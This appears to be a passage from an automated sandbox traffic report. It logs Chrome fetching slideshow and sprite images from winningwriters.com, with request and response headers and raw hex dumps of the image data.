                                                                                                                                                                                            Data Ascii: PNGIHDR2{tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            33192.168.2.164975166.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC889OUTGET /graphics/tompoetry/hagen_slide_show.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 14 Apr 2024 17:32:08 GMT
                                                                                                                                                                                            ETag: "1a882-61611e2594b7f"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 108674
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:07 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5a 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 64 62 61 33 64 61 33 62 35 2c 20 32 30 32 33 2f 31 32 2f 31 35 2d 31 30 3a 34 32 3a 33 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyZhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 49 a1 cb 01 e8 74 d6 94 c0 79 ae 6c 73 f6 1c 02 f4 da 0f 8b 00 94 7e ff 00 b7 01 90 f8 7c 26 a7 2c 02 7f d2 62 0f 51 80 09 da 32 35 dd db 80 51 a8 f6 60 02 73 a8 ea 32 f6 e0 30 e8 48 38 02 9a fe 5a e0 0a 8e ec 02 57 00 ba d4 1f b7 d9 80 5a 65 9e 7d de ec 02 0e fe 98 00 8a 0e dc 01 5d 7b 2b 80 3a 0c f2 c0 1d 2b db 80 5c e9 9e 00 d6 ba fd bd 2b 80 41 96 5d b4 c0 03 bf dd ae 00 1a 12 3a f4 c0 1d 32 c0 1a 9d 3d 83 3c 01 43 d0 7b b0 07 bb db 80 3a 9e b4 c0 1d e0 d2 98 05 27 5e cc 02 57 43 d9 d9 80 29 d9 fd 78 04 fb 69 80 3a 6b 80 52 3f af 00 64 7b cf e5 d9 80 4e dc 01 df a7 7e 03 2d 7d bd 06 78 04 ae 7e cd 72 c0 1a e5 f7 7d d8 00 e7 df d9 ef c0 77 8f fc b1 69 5f fb f8 a7 ff 00 ab dc 6c e7 ca 90 d9 0e 0e ea 48 c6 35 c7 75 72 c0 28 cc f6 65 ae 03 21 51 5a e6 00
                                                                                                                                                                                            Data Ascii: Ityls~|&,bQ25Q`s20H8ZWZe}]{+:+\+A]:2=<C{:'^WC)xi:kR?d{N~-}x~r}wi_lH5ur(e!QZ
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 3c 28 ee 5e 68 20 f3 8d 48 65 27 37 40 4e 74 19 28 af 51 ae 03 30 0a c2 80 c6 22 14 52 a1 4d 24 8f 43 b5 aa 7e ec 06 95 c5 c0 89 bf 0a 22 8c e4 ef 07 61 19 e4 73 d6 9a 52 ba 60 34 bc b7 49 54 48 cf 30 51 5f 31 bf 58 76 01 a1 d7 5c 06 37 2c b1 33 b0 90 2b 4a 40 00 28 0b b6 85 74 a5 6a 46 a7 ae 01 a4 54 09 e0 5b 80 14 14 58 cd 43 06 2c 01 19 1a 06 fb 45 3b 70 1a f2 01 1a 33 32 b1 57 22 8c 14 51 19 6a 0d 55 7b 7a d3 00 d9 2c 89 21 22 45 50 cf 50 48 ad 3c 3e de 9d b8 06 79 cd 1e a3 25 07 70 e9 ec 35 ec ee c0 6a c9 29 6a ef 60 8c b5 01 b5 04 56 95 c0 68 48 0a d5 28 36 1c e9 4d 6b 9e 54 f6 60 35 dd 94 d2 a4 65 d3 b4 d3 01 e4 d4 a1 db a8 e9 ec c0 79 d7 42 34 1a 8a e9 80 43 4a 6e a6 01 73 a0 a5 33 d7 01 89 21 45 07 c5 d7 00 bd 0a 9a 57 a0 c0 14 6f c8 9c 02 d3 2a
                                                                                                                                                                                            Data Ascii: <(^h He'7@Nt(Q0"RM$C~"asR`4ITH0Q_1Xv\7,3+J@(tjFT[XC,E;p32W"QjU{z,!"EPPH<>y%p5j)j`VhH(6MkT`5eyB4CJns3!EWo*
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 6b f9 ed c5 9c 76 e8 de 7a 98 c3 4a 55 86 85 40 a5 5b 5a 83 ed c0 53 1e a3 fa 4f 25 fb 7f 11 b8 e2 a1 ba b4 80 ef b6 91 d4 4d 72 80 02 80 a8 2a 7f 54 f4 e9 80 a1 fd 41 fc ba f0 97 dc 61 8f fd 46 53 64 b2 96 61 6f 1c 71 4f 23 b1 2e d2 13 97 c4 1a 8c 09 cf 01 55 c9 f4 6f 81 e1 26 48 6d f8 e1 c3 c6 ec c6 0b 47 f0 db b3 ed 0c 02 f9 62 b1 48 a7 46 1d 75 c0 48 6d fd 1f ca d9 0b 54 bb 89 6e ec d0 19 23 e4 57 2b 88 c9 60 7c b6 20 d1 d1 b5 e8 6b ae 02 e0 fa 6f 2f 2d e9 ae 50 3c b2 34 36 57 8e d0 7c c8 6c bc c9 41 25 1b 4a 28 3f b4 3a 65 d3 01 da 9c 1f a8 1c a4 71 ce 82 64 48 94 b4 b4 db e5 b8 5d ac 69 d4 1e bd 9a e0 2c db 3b 95 4b 59 66 9a 59 a7 82 83 c8 46 90 2c 4b a5 40 51 f0 8a e0 19 ae ef 66 b9 69 d5 e1 77 62 e4 8f 2e 81 1c 30 15 07 75 32 50 29 4f 6e 02 5f 67
                                                                                                                                                                                            Data Ascii: kvzJU@[ZSO%Mr*TAaFSdaoqO#.Uo&HmGbHFuHmTn#W+`| ko/-P<46W|lA%J(?:eqdH]i,;KYfYF,K@Qfiwb.0u2P)On_g
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: c7 33 05 dc 11 83 6a b4 f3 04 44 05 a3 36 45 98 64 4e 74 af 43 80 bc fd 34 f0 cd 0a 32 4f bd bc af 2d fc 45 49 1f b2 c3 f6 87 68 c0 58 6d 6d 6d 3f 1b 3c 36 f0 30 bd 0a cc d7 74 50 08 55 da a0 0a d6 9d 30 1f 3f fe bf 46 27 e4 78 4b 61 1a 7c d5 ac e7 cd 5a 90 55 58 9a 02 b4 a0 d2 a0 9c f2 c0 56 fe 90 e1 bf d6 1e 6b 92 bb e5 1c 45 0f 17 b2 0b 28 82 90 aa ca 4e 6a 2b b4 93 fa a4 fb 70 13 cf 54 70 3e a4 e2 f8 0f 51 43 e8 6f 46 ff 00 ac bc 97 a3 f8 eb 6e 77 d5 7c 93 dd 5b 24 5c 37 11 c8 5e fc 94 5c 95 da cd 32 4b 70 3c dc bc 98 55 9f ad 02 82 70 1c d9 fc f0 7d 15 87 d0 3f ca 7f aa fd 73 ce cd fe b9 fd 41 e7 64 e3 cd ef 36 47 f9 9d b5 95 c3 81 b6 d0 2f c2 68 c1 6b 9e b4 34 cb 01 f0 47 e8 e5 8f d0 8b bf e6 73 e8 bf 11 fc d8 fa 83 94 f4 e7 f2 b1 ca de 4f 6f f5 5f
                                                                                                                                                                                            Data Ascii: 3jD6EdNtC42O-EIhXmmm?<60tPU0?F'xKa|ZUXVkE(Nj+pTp>QCoFnw|[$\7^\2Kp<Up}?sAd6G/hk4GsOo_
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 71 02 26 90 5d 32 c8 e5 e3 0b 40 a4 a6 ef 09 d6 83 40 06 b8 0d 1b 85 ba 31 b2 8d 92 c7 07 80 b3 05 56 01 e8 c7 3a 8a 0a 0e 98 0d 68 56 38 fe 6a 0b 88 9a 47 b8 56 26 e2 39 48 2b d4 ae f5 cc 7b ba e7 80 ca 2b af 32 e0 4b 71 e3 59 8e d7 2c ec 59 49 15 50 54 e4 6a 35 fd 35 c0 49 0a d9 dd 11 6f 3c 21 66 a7 96 db 5c 87 20 d3 35 db 5d 29 5a 1e cc 03 54 bc 61 82 f1 ee 14 8b a8 2d a3 06 68 0d 53 7e ca 80 de f3 42 7b f4 c0 6c 71 b3 20 bb 8a 34 09 07 99 e1 69 a4 6c d4 12 5c 95 0e 00 af 5a 1f 76 02 49 2d 9d 8d e3 5a b5 c2 84 92 dd 14 da cc b5 51 43 ba a5 ab ae d3 d0 6b 80 82 f3 5c 35 da bc f3 f9 66 58 a4 60 26 8d 83 46 24 59 56 be 62 a9 a5 2b e1 f1 76 77 e0 20 7c ca de d9 cf f2 c0 7e 0c 65 37 ec 6a b2 11 fa ad 50 68 17 4d 73 f6 e0 1d b8 79 ee 2d 1a de 48 51 5d 63 1e
                                                                                                                                                                                            Data Ascii: q&]2@@1V:hV8jGV&9H+{+2KqY,YIPTj55Io<!f\ 5])ZTa-hS~B{lq 4il\ZvI-ZQCk\5fX`&F$YVb+vw |~e7jPhMsy-HQ]c
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 3d 7b b0 0d ed eb 25 9d ca 6f 11 2c bb 07 93 25 41 0c c7 6a 81 bb f5 4f ed 0e cc 04 c7 89 b6 9a fa 37 4b c0 63 f0 d2 7d c4 e6 bb a8 0a 86 03 2e d1 80 7b b8 e3 2d e3 b7 48 20 9b 7c 68 8b 1c 4a fe 16 a1 34 19 8d 0e 03 99 be a0 2f 35 e8 9e 5a e3 99 e2 2c 5a 2b 09 62 1e 74 66 b2 2a 37 c2 cf bb 33 b6 bd 7b 70 10 ae 23 f9 90 96 d2 d6 3b 2f e1 77 57 31 a1 9d 1a f1 94 85 0c ab 5c 8d 55 a9 bb 2a 76 e0 1e ac 7e ba 71 5c bd db 91 2a f1 bc cd ba 24 77 56 05 fc b9 94 ca 41 04 07 34 63 d5 88 ae 02 e0 e1 3e bb dc da 5b c5 c7 dd 41 34 8c aa 37 4c 36 a2 b3 16 a5 49 00 9a d0 d7 3c 07 5f fd 25 fa df e9 08 12 54 e6 b8 b6 90 4e bb 56 e4 2a b6 c0 c0 06 62 06 54 da 3e dc 03 bf a9 7e a5 7a 6a e6 f2 3b 8e 22 df c2 9b 80 bc 2b 46 64 2f e0 f0 d6 bb 40 3a 0d 3a e0 39 37 eb 9f d6 db
                                                                                                                                                                                            Data Ascii: ={%o,%AjO7Kc}.{-H |hJ4/5Z,Z+btf*73{p#;/wW1\U*v~q\*$wVA4c>[A47L6I<_%TNV*bT>~zj;"+Fd/@::97
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: b4 77 11 ac 65 df 75 37 57 75 35 d6 87 01 21 ba 91 e7 b4 e2 ee 7c fd f1 dd 59 9b 8b 78 d4 a8 91 67 86 63 1c bb b3 d0 50 54 81 90 24 9c 05 7b cf dc 25 b7 37 04 e6 44 f2 2f bc bb 93 2f 8a 40 7e 63 c0 06 bb 6a 0a 9c 8f bf 00 f4 f7 d6 76 d2 df 6d 99 b6 24 6d e4 5c 08 4a c6 e5 46 dc c0 cb 76 63 dd 4a 69 80 d0 be f4 ec f0 cb 7b 72 6e be 5a ca f2 08 00 8d 98 12 37 01 be b4 a6 47 23 43 53 80 60 9f d3 9e 9c b3 e4 c4 71 71 eb 73 05 a8 73 6b 24 cc f3 bc a1 e1 a4 8e 09 20 9c cd 68 7d b8 06 6b 2f 4f 70 0d b9 38 ce 12 d6 79 ef 01 dd 77 24 48 e1 1c 29 65 3b f3 a7 88 6b 80 73 b3 f4 65 cc cc 92 f2 70 59 a4 d5 26 28 d6 24 23 75 43 6a 02 8d 57 2a 60 24 31 fa 5f 8c b7 75 9a fe f5 64 93 7e 7c 7f cb c0 1e 03 18 02 aa 48 66 db 9d 73 ed c0 3c 3f 1d e9 88 8a 06 49 6f b7 91 f3 71
                                                                                                                                                                                            Data Ascii: weu7Wu5!|YxgcPT${%7D//@~cjvm$m\JFvcJi{rnZ7G#CS`qqssk$ h}k/Op8yw$H)e;ksepY&($#uCjW*`$1_ud~|Hfs<?Ioq
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: b5 39 13 4c 04 96 3e 6b 9b b2 bc b6 83 86 e0 a1 d4 cb 24 f7 65 9e 9e 65 49 ac 63 c3 91 20 67 96 02 e2 e3 ec 3e a4 f3 d1 da db c7 ea 79 38 e8 ae 4a cb 6f 65 c6 c3 04 0d 16 ed bb 98 48 c0 b1 39 78 41 20 0f 7d 30 12 0e 6b d0 2f 27 1d 71 6d c9 f2 dc 9f 31 71 1a 1b 9b 7b b9 ef 2e 19 52 50 7c 4f 46 7a 6d ae 44 e5 9f d9 80 d5 e3 fe 9d 7a 47 e5 12 d8 58 c5 2c 6c 48 a7 8e 59 0b a8 dc 5d 85 4d 77 12 73 39 76 60 37 2c fd 11 e9 eb 39 6e 16 de c9 61 57 29 b6 e3 62 12 3a 54 ed 03 20 49 cb 3a 8c b0 0f f1 70 30 f1 56 6d 34 d1 fe 1c 85 56 27 09 5c c1 da a4 2d 32 53 5c fb 3a e0 36 ac 50 25 dc 87 6d 12 2a 2c 4a 99 f8 97 21 4e da d7 a6 02 ea f4 fd bc 8a 90 86 a0 70 45 09 1e 22 5b 2c bb c1 c0 4f 6d 22 11 57 cd dd 9e 4e a4 75 d4 74 fe dc 06 d3 cb 2c a5 1c 7e 1d 3c 2d 11 c8 a8
                                                                                                                                                                                            Data Ascii: 9L>k$eeIc g>y8JoeH9xA }0k/'qm1q{.RP|OFzmDzGX,lHY]Mws9v`7,9naW)b:T I:p0Vm4V'\-2S\:6P%m*,J!NpE"[,Om"WNut,~<-
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 37 a1 dd 92 69 08 97 29 68 bb 82 0c c6 5a 54 e0 25 5e 41 f2 19 e5 da d7 09 14 92 b5 6b b4 9a 12 87 76 7a 75 18 07 6e 2e ee 75 b0 56 96 11 6c 9c 94 50 89 ad 80 a4 96 e1 ea 4a fe ce e6 03 70 6d 7b 70 1b 2d 76 64 6b 45 f3 db 77 85 d2 15 2c 44 6e f5 75 a1 cb 71 db d7 41 80 9b f1 8a a4 33 6c db 23 b2 30 6c 99 aa 16 9d 4d 02 d0 68 34 c0 48 ad 50 08 58 03 58 f3 d8 a3 c3 4e bf 9f 00 e7 6a b5 35 4a 82 4a 97 03 2a 11 d9 80 97 59 20 50 ac 4d 4b 6b 5f cd 96 01 eb c2 b9 81 47 3e da ff 00 46 00 8d 81 94 33 1c e8 70 1e f9 54 9d d4 ae 03 26 26 83 3a 03 d7 b7 01 89 51 b4 1d 3b f0 19 1a 93 90 cf b7 b3 00 11 53 f0 57 be b8 00 0a 6e 03 23 80 37 53 23 af e5 d9 80 2b 5c d4 d3 f6 bf 23 80 4a d0 d4 b5 6a 30 03 10 7a e0 31 ef 27 db 80 51 5c eb f6 f5 c0 63 97 53 5e cc 02 8e da e7
                                                                                                                                                                                            Data Ascii: 7i)hZT%^Akvzun.uVlPJpm{p-vdkEw,DnuqA3l#0lMh4HPXXNj5JJ*Y PMKk_G>F3pT&&:Q;SWn#7S#+\#Jj0z1'Q\cS^


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            34192.168.2.164975266.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC651OUTGET /assets/images/social-sprite-2020_new.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 09 Mar 2023 14:20:15 GMT
                                                                                                                                                                                            ETag: "11a3-5f67857f2f734"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 4515
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:07 UTC4515INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 b7 00 00 00 16 08 06 00 00 00 82 2e 0d d4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 11 38 49 44 41 54 68 43 ed 5b 79 94 55 45 7e ae ba fd 7a 45 1a 41 69 54 14 45 86 69 08 89 82 61 3a 40 3f fa 75 23 3b 8e 1b 82 a8 38 c6 09 18 1d 32 46 69 06 c5 64 d4 78 8e 4e 32 3a 33 82 71 f9 63 ce 19 01 11 18 18 19 87 19 60 06 a5 f7 66 77 85 40 a2 c8 de dd ec 84 ad 5f bf ad f2 7d 75 eb 3d de fe ee 6b c8 c9 39 49 3e f8 f5 ad aa 7b 6f dd 5a be fa d5 ef 57 55 4f 8a 14 18 36 6c 58 61 5e 5e de 30 29 d5 50 25 54 b9 90 e2 2f 85 12 85 78 61 a7 92 a2 49 48 6b 9b df e5 6f dc b8 7e e3 51 f3 ca 65 c5 f0 31 c3 4b 72
                                                                                                                                                                                            Data Ascii: PNGIHDR.sRGBgAMAapHYs(J8IDAThC[yUE~zEAiTEia:@?u#;82FidxN2:3qc`fw@_}u=k9I>{oZWUO6lXa^^0)P%T/xaIHko~Qe1Kr


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            35192.168.2.164975366.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC890OUTGET /graphics/tompoetry/burton_slide_show.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Sun, 14 Apr 2024 17:34:26 GMT
                                                                                                                                                                                            ETag: "1bab4-61611ea9cb7dd"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 113332
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:07 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 64 62 61 33 64 61 33 62 35 2c 20 32 30 32 33 2f 31 32 2f 31 35 2d 31 30 3a 34 32 3a 33 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 99 94 00 84 a8 1c b1 e5 ee c6 02 59 10 c0 41 06 78 73 e2 4f 08 03 f9 9f 6d 30 07 f3 3e c9 00 4d 50 02 1b c1 32 38 ce 00 23 10 d9 20 f1 73 96 58 c0 0d 0d 32 42 a9 3f b2 c0 04 12 e0 10 e9 09 ec 92 ce 01 39 55 06 12 20 0f 64 04 84 c1 91 d3 20 06 72 80 64 02 7e 52 79 af e6 20 23 80 28 0c e6 24 b2 e0 60 0f e6 7d 92 01 a1 3f 34 f8 7d fc 20 1c 95 04 8e 99 72 1f b6 02 f3 2b ff 00 d3 c6 9f ff 00 dc fa b5 65 ff 00 63 a2 61 8c 6b 85 e1 1a 72 56 57 32 47 e1 8f bc c6 4b 1c 96 4a 30 c4 f0 94 96 00 fc 25 94 e4 87 2c 20 09 af 3c 02 49 66 66 a9 38 03 0e 05 13 b0 fd dc 16 01 a1 29 f6 59 ea 49 e1 28 08 99 91 33 86 5c 51 3d e3 18 06 84 4d 25 3e 1d 84 13 c7 94 01 82 82 33 09 da 3b 8a e3 00 81 fb 67 ed e6 90 0f dd de 10 2a 29 18 0c 0c 00 a8 4a f6 2f 67 09 60 90 02 f0 18 61 f9
                                                                                                                                                                                            Data Ascii: YAxsOm0>MP28# sX2B?9U d rd~Ry #($`}?4} r+ecakrVW2GKJ0%, <Iff8)YI(3\Q=M%>3;g*)J/g`a
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 8e 20 0c 3d 92 ed 80 4b f6 ee 4e 13 45 9c 03 f8 e7 c1 24 92 5c 25 00 b0 1d d8 26 58 c0 48 95 c1 39 15 32 f6 e0 65 01 15 e6 67 fb 42 4f 23 00 c2 65 dd 33 92 cd 00 30 07 05 e7 c1 67 cf 9a e7 00 a6 89 39 15 41 ee e7 00 c7 2c f2 0b 2e dc e4 60 1c b0 9e 24 92 79 89 13 c3 18 03 9e 22 63 bc 82 bd fd d0 01 cb 8a 19 63 8a f3 2a a4 c0 2e 18 4f da 93 08 4e 01 60 0e 28 44 8f b9 71 ec 58 03 b3 d8 73 c2 58 09 85 80 39 e5 9f 2c 24 26 a6 5e c8 01 0c 8f 13 81 24 af 03 2c 50 18 03 14 c4 fd e0 70 e7 00 7d c9 3e 18 f0 43 35 80 3b 33 e5 c7 11 3e 62 00 1e c0 11 7b 7b c6 25 20 1f 71 04 4c 24 d3 bb 1e 10 0b 3c 53 bc aa a1 c4 c8 7e d8 02 59 05 49 e3 c0 1e 22 70 02 9e c3 21 f7 22 60 30 9c 01 84 b8 09 cb b1 70 33 80 07 6e 48 a3 ec 32 c6 00 ee cf 09 f2 09 8c 01 cc 7d c0 7d d2 29 84
                                                                                                                                                                                            Data Ascii: =KNE$\%&XH92egBO#e30g9A,.`$y"cc*.ON`(DqXsX9,$&^$,Pp}>C5;3>b{{% qL$<S~YI"p!"`0p3nH2}})
